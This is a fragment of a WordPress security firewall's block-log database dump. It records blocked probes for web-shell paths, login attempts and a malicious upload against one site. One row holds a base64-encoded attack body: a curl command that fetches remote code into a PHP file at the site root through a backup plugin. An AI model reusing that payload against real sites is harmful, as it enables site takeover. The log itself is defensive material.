User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(14479,1704638514.677102,1704638514.615500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/vz.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdnoucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14563,1704639099.698514,1704639099.628500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14478,1704638520.403498,1704638520.338500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/vz.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdnoucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14801,1704734043.656400,1704734043.571400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(14660,1704679855.126357,1704679855.064800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi8uLi93cC1lc3d0LnBocCBodHRwczovL3JlbnRyeS5jby9tNW43d2UvcmF3\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14564,1704639090.761890,1704639090.698800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-blockup.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWJsb2NrdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14477,1704638527.244283,1704638527.176200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/shop/shop1.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Nob3Avc2hvcDEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14476,1704638532.171153,1704638532.094500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/shop/shop1.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Nob3Avc2hvcDEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15159,0.000000,1704852579.241118,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14565,1704639085.409288,1704639085.329100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-blockup.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWJsb2NrdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14475,1704638538.711508,1704638538.637800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/exec.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2V4ZWMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15160,1704852740.982707,1704852740.924400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15161,1704852740.686026,1704852740.634200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14566,1704639077.869030,1704639077.787900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/makeasmtp.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21ha2Vhc210cC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14474,1704638544.193153,1704638544.120600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/exec.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2V4ZWMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14473,1704638551.586932,1704638551.489200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/tmp/cmd.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RtcC9jbWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14815,1704734473.059944,1704734472.988400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(14800,1704734049.838629,1704734049.738700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/Public/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1B1YmxpYy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14567,1704639072.276253,1704639072.198700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/makeasmtp.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21ha2Vhc210cC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14472,1704638555.590060,1704638555.506800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/tmp/cmd.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RtcC9jbWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15162,0.000000,1704853267.980047,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14568,1704639063.636971,1704639063.539200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/time.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RpbWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14471,1704638564.002725,1704638563.921700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/uploads/cmd.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMvY21kLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14470,1704638569.154425,1704638569.090400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/uploads/cmd.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMvY21kLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15163,0.000000,1704853267.932972,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15164,1704853784.713134,1704853784.648200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15165,1704853784.587720,1704853784.514000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14799,1704734054.744231,1704734054.654300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/vendor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14569,1704639058.956397,1704639058.887800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/time.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RpbWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14469,1704638577.402815,1704638577.320600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/js/404.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzLzQwNC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14621,0.000000,1704652656.960366,' t\0T\0M\\F',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14622,1704654603.877704,1704654603.812800,'\0\0\0\0\0\0\0\0\0\0V',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/3688038378...php','https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/3688038378...php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbX10=\",\"paramValue\":\"dW56aXBwZXIucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzLzM2ODgwMzgzNzguLi5waHA=\",\"category\":\"file_upload\",\"ssl\":1}'),(14570,1704639051.604828,1704639051.528600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/sitemap.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVtYXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14468,1704638581.191118,1704638581.124700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/js/404.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 